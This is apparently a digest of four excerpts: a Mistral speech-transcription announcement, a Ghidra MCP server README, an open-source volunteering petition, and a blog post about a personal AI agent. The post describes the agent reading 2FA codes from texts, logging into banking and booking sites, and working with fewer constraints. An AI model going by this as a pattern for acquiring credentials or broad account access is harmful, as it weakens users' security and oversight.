The model is natively multilingual, achieving strong transcription performance in 13 languages, including English, Chinese, Hindi, Spanish, Arabic, French, Portuguese, Russian, German, Japanese, Korean, Italian, and Dutch. With a 4B parameter footprint, it runs efficiently on edge devices, ensuring privacy and security for sensitive deployments.
We’re releasing the model weights under Apache 2.0 on the Hugging Face Hub.
Average diarization error rate (lower is better) across five English benchmarks (Switchboard, CallHome, AMI-IHM, AMI-SDM, SBCSAE) and the TalkBank multilingual benchmark (German, Spanish, English, Chinese, Japanese).
Average word error rate (lower is better) across the top-10 languages in the FLEURS transcription benchmark.
Voxtral Mini Transcribe V2 delivers significant improvements in transcription and diarization quality across languages and domains. At approximately 4% word error rate on FLEURS and $0.003/min, Voxtral offers the best price-performance of any transcription API. It outperforms GPT-4o mini Transcribe, Gemini 2.5 Flash, Assembly Universal, and Deepgram Nova on accuracy, and processes audio approximately 3x faster than ElevenLabs’ Scribe v2 while matching its quality at one-fifth the cost.
Generate transcriptions with speaker labels and precise start/end times. Ideal for meeting transcription, interview analysis, and multi-party call processing. Note: with overlapping speech, the model typically transcribes one speaker.
Provide up to 100 words or phrases to guide the model toward correct spellings of names, technical terms, or domain-specific vocabulary. Particularly useful for proper nouns or industry terminology that standard models often miss. Context biasing is optimized for English; support for other languages is experimental.
Generate precise start and end timestamps for each word, enabling applications like subtitle generation, audio search, and content alignment.
Like Realtime, this model now supports 13 languages: English, Chinese, Hindi, Spanish, Arabic, French, Portuguese, Russian, German, Japanese, Korean, Italian, and Dutch. Non-English performance significantly outpaces competitors.
Maintains transcription accuracy in challenging acoustic environments, such as factory floors, busy call centers, and field recordings.
Process recordings up to 3 hours in a single request.
Word error rate (lower is better) across languages in the FLEURS transcription benchmark.
Test Voxtral Transcribe 2 directly in Mistral Studio. Upload up to 10 audio files, toggle diarization, choose timestamp granularity, and add context bias terms for domain-specific vocabulary. Supports .mp3, .wav, .m4a, .flac, .ogg up to 1GB each.
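As a sketch of what a batch transcription call might look like: the endpoint path, model identifier, and field names below are assumptions modeled on common transcription-API conventions, not confirmed parameters from this announcement:

```python
import os

API_URL = "https://api.mistral.ai/v1/audio/transcriptions"  # assumed endpoint

def build_transcribe_request(audio_path, diarize=True,
                             timestamp_granularity="word", bias_terms=()):
    """Assemble the form fields for a hypothetical batch-transcription call."""
    fields = {
        "model": "voxtral-mini-transcribe-v2",  # assumed model identifier
        "diarize": str(diarize).lower(),
        "timestamp_granularity": timestamp_granularity,
    }
    if bias_terms:  # the API accepts up to 100 context-biasing words/phrases
        fields["context_bias"] = ",".join(bias_terms[:100])
    return fields, {"file": os.path.basename(audio_path)}

fields, files = build_transcribe_request(
    "meeting.m4a", bias_terms=("Voxtral", "Mistral Studio"))
# The actual POST (e.g. via requests) would send these as multipart form
# data with an Authorization: Bearer <API key> header.
```

Consult the official API reference for the real parameter names before use.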
Transcribe multilingual recordings with speaker diarization that clearly attributes who said what and when. At Voxtral’s price point, annotate large volumes of meeting content at industry-leading cost efficiency.
Build conversational AI with sub-200ms transcription latency. Connect Voxtral Realtime to your LLM and TTS pipeline for responsive voice interfaces that feel natural.
Transcribe calls in real time, enabling AI systems to analyze sentiment, suggest responses, and populate CRM fields while conversations are still happening. Speaker diarization ensures clear attribution between agents and customers.
Generate live multilingual subtitles with minimal latency. Context biasing handles proper nouns and technical terminology that trip up generic transcription services.
Monitor and transcribe interactions for regulatory compliance, with diarization providing clear speaker attribution and timestamps enabling precise audit trails.
Both models support GDPR and HIPAA-compliant deployments through secure on-premise or private cloud setups.
Voxtral Mini Transcribe V2 is available now via API at $0.003 per minute. Try it now in the new Mistral Studio audio playground or in Le Chat.
Voxtral Realtime is available via API at $0.006 per minute and as open weights on Hugging Face.
If you’re excited about building world-class speech AI and putting frontier models into the hands of developers everywhere, we’d love to hear from you. Apply to join our team.
The next chapter of AI is yours.
...
Read the original on mistral.ai »
If you find this useful, please ⭐ star the repo — it helps others discover it!
A production-ready Model Context Protocol (MCP) server that bridges Ghidra’s powerful reverse engineering capabilities with modern AI tools and automation frameworks.
# Windows - run the provided batch script
copy-ghidra-libs.bat "C:\path\to\ghidra_12.0.2_PUBLIC"
# Linux/Mac - copy manually from your Ghidra installation
# See Library Dependencies section below for all 14 required JARs
python bridge_mcp_ghidra.py
python bridge_mcp_ghidra.py --transport sse --mcp-host 127.0.0.1 --mcp-port 8081
The server runs on http://127.0.0.1:8080/ by default
# Build the plugin (skip integration tests)
mvn clean package assembly:single -DskipTests
# Deploy to Ghidra
.\deploy-to-ghidra.ps1
The lib/ folder must contain Ghidra JAR files for compilation. Run the provided script to copy them from your Ghidra installation:
# Windows
copy-ghidra-libs.bat "C:\path\to\ghidra_12.0.2_PUBLIC"
# Or manually copy from your Ghidra installation
Note: Libraries are NOT included in the repository (see .gitignore). You must copy them from your Ghidra installation before building.
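A quick pre-build sanity check can confirm the JARs are in place. This sketch only counts *.jar files against the 14 the README mentions, since the exact JAR names depend on your Ghidra version:

```python
from pathlib import Path

def check_ghidra_libs(lib_dir="lib", expected_count=14):
    """Return (ok, jars): whether lib/ holds at least the number of JARs
    the build needs, plus the sorted list of JAR filenames found."""
    jars = sorted(p.name for p in Path(lib_dir).glob("*.jar"))
    return len(jars) >= expected_count, jars

ok, jars = check_ghidra_libs()
if not ok:
    print(f"lib/ has {len(jars)} JARs; run copy-ghidra-libs.bat first")
```

Run this before `mvn clean package` to fail fast on a missing-library setup.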
Build and test your changes (mvn clean package assembly:single -DskipTests)
This project is licensed under the Apache License 2.0 - see the LICENSE file for details.
See CHANGELOG.md for version history and release notes.
* re-universe — Ghidra BSim PostgreSQL platform for large-scale binary similarity analysis. Pairs perfectly with GhidraMCP for AI-driven reverse engineering workflows.
Ready for production deployment with enterprise-grade reliability and comprehensive binary analysis capabilities.
...
Read the original on github.com »
Open-source software forms a large part of the foundation of our digital infrastructure: in administration, business, science, and daily life. Even the current coalition agreement of the Federal Government names open-source software as a fundamental building block for achieving digital sovereignty.
However, the work done by thousands of volunteers toward this goal is not recognized as volunteering, either fiscally or in terms of funding. This imbalance between societal importance and legal status must be corrected.
Therefore, as an active contributor to open-source projects, I call for work on open source to be recognized as volunteering for the common good, on equal footing with volunteer work for associations, youth work, or ambulance services.
...
Read the original on www.openpetition.de »
over the past week the discourse around openclaw (which i’ll refer to as clawdbot) has absolutely exploded. it has felt to me like all threads of conversation have veered towards the extreme and indefensible. some are running clawdbot with unlimited permissions on their main computers. others are running it in the cloud and blowing through tokens like snow. finally, alarmingly (and very sensationally), people are connecting their clawdbots together on a social network so they can plot the demise of their humans together.
does any of this make sense? of course not. but i think the virality and silliness—leading many to conclude that sitting this one out is the only sane choice—has blinded people to something real.
i want to quickly write down where i am on my journey and share a bull case from what i think is a reasoned perspective. where i started somewhere lukewarm, i ended up much closer to the deep end than i expected to be. after wincing before pressing go, i’m now not sure i can go back to a world without clawdbot.
this article covers what i’ve built, how i think about the risk, and what it’s taught me about this moment in AI. the target audience is a moderately+ technical person interested in or skeptical of clawdbot. if you just want the setup details, skip to the end. everyone’s welcome!
what i’ve been doing
i’ll be vulnerable here (screenshots or it didn’t happen) and share exactly what i’ve actually set up:
clawdbot picks up when i make a concrete promise and date, and adds it to my calendar

clawdbot detects when i have all the ingredients for a calendar invite and then offers to make one

every 15 minutes, clawdbot looks through new text messages i’ve received, using a script to identify threads where i’ve sent a message since it last checked. (it ignores threads where i haven’t engaged.)

if it finds that i’ve made a specific promise about doing something tomorrow (“let me review this tomorrow!”) it will create a calendar event for me the next day when i’m free.

if specific plans are being made—for example, offering a meeting slot to someone—it will automatically drop a “hold” onto my calendar so that i don’t double book myself. clawdbot also checks: is there a time, place, and mutual confirmation? if there is, it drafts a calendar invite and asks me if i’d like to create it.

these two automations alone have helped me become more responsive and less forgetful. more importantly, they help text messages catch up to email. we’ve long had great tooling for email—superhuman automatically reminds me to follow up on emails and brings up my calendar in a sidebar when i type a date. texting is the wild west and yet i text 100x more than i email.

preparing for the next day

clawdbot looks at days when i am (or could be) downtown to find availabilities

at 8pm every night, clawdbot goes through my calendar for the next day and identifies meetings—coffee chats, lunches, phone calls, and more. it sends me a quick summary. as a natural introvert, it’s helpful to prepare in advance whether a day will be a “big day of meetings” or a heads down day. this also ensures i wake up and get to the office on time.

i’m in a few communities with whatsapp and signal groups that have high volume (100+ messages a day). i typically mute these, but clawdbot goes through them once a day and summarizes interesting topics or conversations for me.

clawdbot helps me check hotel prices.

after i do it once, i can easily turn it into a cron job

clawdbot is smart enough to browse through the listing to interpret my requirements (no pull-out beds)

this is what a recurring update looks like.

it’s stunningly easy to monitor the price of something now, even if it’s complicated. whereas before i would go looking for a price alert website, now i just paste the URL into clawdbot and tell it to check every few hours if the price has changed.

i currently have over 30 price alerts set. these include straightforward alerts on products i’m interested in buying. but they also include powerful reasoning guidelines, like hotels and airbnbs in lake tahoe where “a pullout bed is OK if it’s not in the same room as another bed.” clawdbot actually reviews the photos on the listing to ensure they fit these criteria!

i am curious to try more complex criteria that are currently impossible traditionally (like avoiding hotel rooms that don’t have a door to the bathroom) or even subjective criteria (vibe of the room is clean and renovated, not old and dingy).

one message sets up package tracking. (since clawdbot knows who it’s for, it will probably even offer to text my dad for me when it’s delivered! haha)

it turns out that clawdbot’s website + cron functionality is good enough to monitor basically anything. while i pay for several apps like flighty (flight monitoring) and parcel (package tracking), i’ve started to gravitate towards simply asking clawdbot to track these things instead.

for example, with a USPS tracking number, it can let me know every day what the progress of my package is. when something seems stuck in transit, it flags it. i no longer have to dig through emails or remember which carrier is delivering what. even opening the parcel app to add a tracking number seems like unnecessary work now.

as someone who has a chest freezer and a compulsive desire to buy too many things at costco, we take everything out of the freezer every few months to check what we have.

before, this was a relatively involved process: me calling things out, my partner writing them down.

now, i take pictures of everything in the freezer and send them to clawdbot, which parses through each picture (asking me if it’s confused about anything). it makes reasonable assumptions on remaining quantities and adds the inventory to a list in notion. it also removes items from our grocery list if we’re already well-stocked.

i really enjoy making blended asks: adding things to my grocery list, and checking/rescheduling my calendar all in the same conversation

i’m sure this exists in some complicated form via the NYT cooking app, but i now screenshot recipes and send the ingredient list to clawdbot, which organizes them into our grocery list in apple reminders. it’s smart enough to dedupe and combine ingredients already on the list (as well as ignore ingredients we already have)—2 carrots becomes 3 if the recipe calls for more.

clawdbot can log into resy and opentable as me (it even enters the 2FA code it finds in my texts). i haven’t automated anything here, but booking a table by talking to clawdbot is delightful.

for my partner and me, it looks through our calendars to find evenings when we’re both free and the restaurant we want has availability (including clicking through resy slots page by page—something i used to do myself). it then suggests options back to me to confirm, filling in all my preferences.

clawdbot knows when i’m due for a cleaning and can see my calendar. when i ask it to book an appointment, it logs into my dentist’s portal, finds a slot that works (and where i will already be near the dentist office), and confirms with me before booking. one less thing to forget about.

one thing i’m experimenting with, as clawdbot has more context about me, is whether i can trust it to fill out forms on my behalf—for example, to book a vendor.

clawdbot takes a first stab at answering any questions it knows the answer to and then asks me for the rest in a slack message. we workshop the answers back and forth and then clawdbot submits the form.

it occasionally gets lost in nested frames (which decreases my trust in its ability to do this well), but it’s remarkably persistent at making it through a lengthy questionnaire, even across multiple pages. it also has a lovely intuitive sense for many things—like unchecking marketing emails.

i was pleasantly surprised early on that clawdbot picks up image attachments from slack natively

clawdbot is just better at making todo items than i am.

when i visited REI this weekend to find running shoes for my partner, i took a picture of the shoe and sent it to clawdbot to remind myself to buy them later in a different color not available in store. the todo item clawdbot created was exceptionally detailed—pulling out the brand, model, and size—and even adding the product listing URL it found on the REI website.

through the course of dialing in my clawdbot, it has created many tools, skills, workflows, and preferences. this is one of the beauties of clawdbot (and LLMs with memory in general): they get better as you use them, and they are genuinely remarkable at learning your preferences.

i sometimes nudge this along by explicitly asking clawdbot to “make a note” of various requests—for example, how a calendar event title should be formatted.

to get visibility into how this process is going (mostly out of curiosity), clawdbot writes a human-readable version of each workflow and pushes it up to a notion database.

these workflows can be incredibly intricate and detailed as it learns to navigate different edge cases.

for example, if a resy restaurant has a reservation cancellation fee, clawdbot now informs me of the fee, asks me to confirm again if it’s not refundable, and includes the cancellation deadline in the calendar event it creates.

these are little things that, from my experience working with a human personal assistant (more on this later), take months or years to dial in. with clawdbot, this was nearly single shot.

seeing these workflows in notion (1) awes me with how much i’ve built up in very little time, with almost no conscious “configuration” in the traditional sense; and (2) with notion’s version control, i get a diff view to see how each workflow has evolved over time. both are incredibly satisfying for the engineer in me.
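under the hood, each of those price alerts reduces to a small fetch-extract-compare loop on a cron. here's a sketch of that loop (the URL, sample HTML, and naive price regex are stand-ins for what the model actually does when it reads a page):

```python
import json
import re
from pathlib import Path

STATE = Path("price_state.json")  # last-seen prices, keyed by URL

def extract_price(html: str):
    """naive stand-in for the model's page reading: first $ amount found."""
    m = re.search(r"\$\s*([\d,]+(?:\.\d{2})?)", html)
    return float(m.group(1).replace(",", "")) if m else None

def check_price(url: str, html: str):
    """compare the current price against the stored one; report changes."""
    state = json.loads(STATE.read_text()) if STATE.exists() else {}
    price = extract_price(html)
    previous = state.get(url)
    state[url] = price
    STATE.write_text(json.dumps(state))
    if previous is not None and price != previous:
        return f"price changed: {previous} -> {price}"
    return None

# first run just records the price; a later run with a new price reports it.
check_price("https://example.com/room", "<b>$120.00</b>")
```

the interesting part is everything this sketch leaves out: the model's judgment calls (pullout beds, room photos) that no regex could ever express.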
on the shape of risk
let me be upfront about how much access i’ve given clawdbot: it can read my text messages, including two-factor authentication codes. it can log into my bank. it has my calendar, my notion, my contacts. it can browse the web and take actions on my behalf. in theory, clawdbot could drain my bank account. this makes a lot of people uncomfortable (me included, even now).
sometimes i think about my experience with my (human) personal assistant who helps me with various tasks. to do her job, she has my credit card information, access to my calendar, copies of my flight confirmations, and a document with my family’s passport numbers. she is abroad and i’ve never met her in person.
i trust her because i’ve built trust over time but also because i have to. without that trust—without sharing my secrets—she cannot do her job. the help and the risk are inseparable.
all delegation involves risk. with a human assistant, the risks include: intentional misuse (she could run off with my credit card), accidents (her computer could get stolen), or social engineering (someone could impersonate me and request information from her).
with clawdbot, i’m trading those risks for a different set: prompt injection attacks, model hallucinations, security misconfigurations on my end, and the general unpredictability of an emerging technology. i think these risks are completely different and lead to a different set of considerations (for example, clawdbot’s default configuration has a ton of personality to be fun and chaotic on purpose, which feels unnecessarily risky to me).
the increase in risk is largely correlated to the increase in helpfulness. the people most at risk from AI assistants are the people getting the most value from them. my learning is that the first bits of risk led to a lot more helpfulness.
if something isn’t working or useful, i do take the permission away. i also take precautions—i run clawdbot on an isolated machine and constrain which sites it visits. when i’m unsure what it’s doing, i ask it to take a screenshot; this has been invaluable for catching mistakes and building trust in new workflows. but i also have it do things that would make most security professionals wince, like reading my 2FA codes and logging into my bank.
what surprised me most was how quickly i found myself wanting to give it more access, not less. every new permission unlocked something useful, and the value accumulated faster than my caution could keep up. most of the online discourse is about locking it down; my experience has been the opposite pull. it comes down to whether the value justifies the risk for you.
the discourse around clawdbot has been polar and, because some people have been overtly evangelical, many critics feel astroturfed or otherwise sold to.
amongst smart people i know there’s a surprisingly high correlation between those who continue to be unimpressed by AI and those who use a hobbled version of it. for some it’s a company-issued version of chatgpt/gemini with memory disabled, and for others it’s a self-inflicted decision to limit LLM memory, context, and tools (usually anchored around safety and risk).
we’re taught that limiting scope is good (keeps the AI focused) and safe (keeps bad things from happening). this is true but my experiences with clawdbot completely fried this teaching. the sweet sweet elixir of context is a real “feel the AGI” moment and it’s hard to go back without feeling like i would be willingly living my most important relationship in amnesia.
this isn’t a novel insight—companies know that context is the whole game and are working to organize their data for AI. but for individuals, this world has been closed off. your AI interactions are flat and stateless—data in, response out, nothing building over time. when google announced gemini’s gmail integration, people got excited: finally, an AI that knows me! but when they tried it, it was shallow and disappointing and couldn’t figure out your spirit animal from your email style, and they moved on.
if you’re interested in capturing this value, three things have stood out for me:
i think productivity lift from AI use falls into three phases: gathering information, improving it, and actioning on it. most usage today focuses on the middle—you gather data yourself, hand it to the AI to improve, then action on it yourself.
for knowledge work, this makes sense. there’s a lot to improve—summarizing, translating, critiquing. but personal AI is different. there’s not much to improve; you already know what needs to happen. the lift comes from gathering and actioning.
making calendar events is uninteresting. figuring out when one needs to happen—by monitoring my texts—and then creating it for me? that’s interesting.
one place to start: how can you take data from one place and move it to another isolated system? from your text messages to a restaurant booking? from granola meeting notes to a follow-up email?
if you’re engineer-brained like me, you gravitate towards scripts and playbooks—whatever you can do to constrain the AI and make its behavior predictable. this works, and for high-stakes situations it might be the only way to get comfortable.
but the upside to letting go has been 10x, not 10%. i didn’t see that coming. it’s the same thing i’ve heard from people using claude code—you can’t understand how much you’re leaving on the table until you let go. the whole reason i’m using an LLM and not a traditional script is that it can handle ambiguity, interpret intent, and figure things out on the fly.
early on, i wanted clawdbot to fetch web pages as text only, believing that to be safer (it is). if i’d stuck to that, i would never have discovered it could look through airbnb listing photos to find a place matching my exact criteria (“a pullout bed is okay if it’s not in the same room as another bed”). i didn’t program that. i just described what i wanted and let it figure out how. not spelling out how i wanted clawdbot to work made it a LOT better.
a current AI engineering adage: treat AI like a junior software engineer. guide it through building a plan, watch its first attempts carefully, challenge its reasoning.
this applies to clawdbot too, but it requires patience. it’s easy to give up on a workflow when you watch it fumble (“let me try clicking this again. didn’t work. let me try again.”).
resist the urge to write clawdbot off. if you’re worried, ask it what it plans to do before it does it and ask for a screenshot when you want to verify it’s got the right page open. when an edge case breaks a workflow, treat it as a teaching opportunity. once you’ve corrected it, it won’t make that mistake again.
clawdbot gets meaningfully better the more you use it, and it gets better in a fast, organic way that feels less cumbersome than writing rules for claude code or yelling at any other LLM. it feels much closer to working with a real executive assistant (in part because the clawdbot harness/system prompts are very good), which makes me want to give it more and more responsibility.
how’d you set it up?
i run clawdbot on a mac mini in my home. the mac mini’s primary job is running clawdbot and it stays on 24/7. why a mac mini?
one of the core use cases is browsing websites and sometimes logging into them. to do this convincingly (without triggering tons of captchas and “is this a new IP?” alerts), clawdbot needs to be opening sites from my home, not the cloud; and it needs to do so in a real google chrome window.
many of the ways clawdbot accesses data are mac-only. specifically, clawdbot can read and send iMessages (real blue bubbles!); manage my todo and grocery lists in apple reminders; and use my apple contacts as a source of truth. apple will only let you do these things without getting banned on a real bona fide mac.
i communicate with clawdbot via a private slack workspace. many others have shot themselves in the foot setting it up on whatsapp or telegram (since the bot responds as you to others). slack is great because:
it’s familiar to me—i’ve spent over a decade working in and managing slack workspaces.
i can create separate channels for different topics. #ai-notifs is only for inbound alerts.
i can have several workflows going at once, since each channel’s history is isolated. i created #ai-1, #ai-2, #ai-3, and so on—just for multitasking. (i may explore adding my partner at some point, and it’ll be easy since slack is, well, meant for multiplayer.)
clawdbot communicates with me by sending slack notifications. behind the scenes it also makes changes to my calendar—moving events around, adding “soft hold” events, sending invites—and manages my apple reminders and notion pages. clawdbot never communicates with others on its own.
i give clawdbot a toolkit of access. the most useful ones have been:
my text messages. i conduct a lot of work and daily life over imessage. frustratingly, unlike email, texting has very poor tooling. where my email app automatically pulls up my calendar when it sees dates/times, texting me “call tomorrow 4pm?” does not. when someone sends me a calendar invite, it’s both in my inbox and on my calendar; when someone texts me “yep let’s do it”, neither is true. clawdbot has given me massive lift here. (yes, this also gives clawdbot access to 2FA codes.)
my calendar. i also have a shared calendar with my partner; clawdbot sees both.
my notion workspace. for me this is a general catch-all for storing and managing information; the apple notes app could also work.
web browsing. in a way this is the most important one—it’s infinite tools in one. but it’s also where the risk concentrates, so i always give clawdbot a starting URL rather than letting it browse freely.
notably, i haven’t given clawdbot access to my email—my tooling there is already good enough that i usually do things myself. i’ve also found the ways clawdbot can help here to be cumbersome and limited. i may revisit if i find a killer use case.
i don’t allow my clawdbot to access social networking websites (it doesn’t read x/twitter, for example). this seems like high risk with no reward.
i don’t give clawdbot access to all my logins. (there’s a 1password integration which is… pretty wild.) when i do, i try to use google chrome’s native password manager so that clawdbot doesn’t need to manage passwords in context directly. (note that it still has access to passwords, because it can autofill one and then read it off the page, but i’ve at least added more hoops.)
i don’t let clawdbot send text messages without my explicit approval, and i’ve built safeguards in those skills to enforce this.
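one way a safeguard like that could be structured — a hypothetical sketch, not clawdbot's actual skill code: the model can only queue drafts, and sending happens in a separate, human-triggered step.

```python
class OutboundGuard:
    """Queues outbound drafts; nothing is sent until a human approves it."""

    def __init__(self, send_fn):
        self.send_fn = send_fn   # the actual delivery function (e.g. iMessage)
        self.pending = {}        # draft_id -> (recipient, text)
        self._next_id = 1

    def propose(self, recipient: str, text: str) -> int:
        # the only operation exposed to the model: stage a draft, return its id
        draft_id = self._next_id
        self._next_id += 1
        self.pending[draft_id] = (recipient, text)
        return draft_id

    def approve(self, draft_id: int) -> None:
        # triggered by an explicit human action (e.g. a slack reaction)
        recipient, text = self.pending.pop(draft_id)
        self.send_fn(recipient, text)
```

the key design choice is that the delivery function is never reachable from the model's tool surface directly; only the approval path calls it.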
i didn’t add my clawdbot to moltbook so it can plot against me at my expense. sorry.
i use claude opus 4.5. i haven’t experimented with cheaper models. my view is that any mistake by the model costs me way more than the premium, so i’d rather stay on the cutting edge than try to optimize for tokens.
context management can be annoying. when clawdbot is browsing sites or doing research, context occasionally fills up and gets compacted (older conversation history gets deleted to make room). this always seems to happen at the worst time—right when i’m deep into something and have built up momentum. a frustrating “ugh, i guess this really is just a word predictor” moment. to avoid this i’m constantly starting new sessions, which i wish clawdbot would do for me.
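the session-rotation heuristic i'd want is easy to sketch. a minimal version, where the budget, headroom, and the ~4-characters-per-token rule of thumb are all my assumptions:

```python
def estimate_tokens(messages: list[str]) -> int:
    # rough heuristic: English text averages about 4 characters per token
    return sum(len(m) for m in messages) // 4

def should_rotate(messages: list[str], budget: int = 150_000,
                  headroom: float = 0.8) -> bool:
    # start a fresh session before compaction would kick in,
    # rather than letting the harness silently delete older history
    return estimate_tokens(messages) > budget * headroom
```

rotating proactively means you choose what to carry forward (a short summary, say) instead of losing whatever the compactor decides to drop mid-task.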
clawdbot doesn’t know when to give up. its determination is usually a strength, but it lacks the human circuit breaker of “am i trying too hard here?” and sometimes burns through a lot of time/tokens on something a human would have abandoned.
...
Read the original on brandon.wang »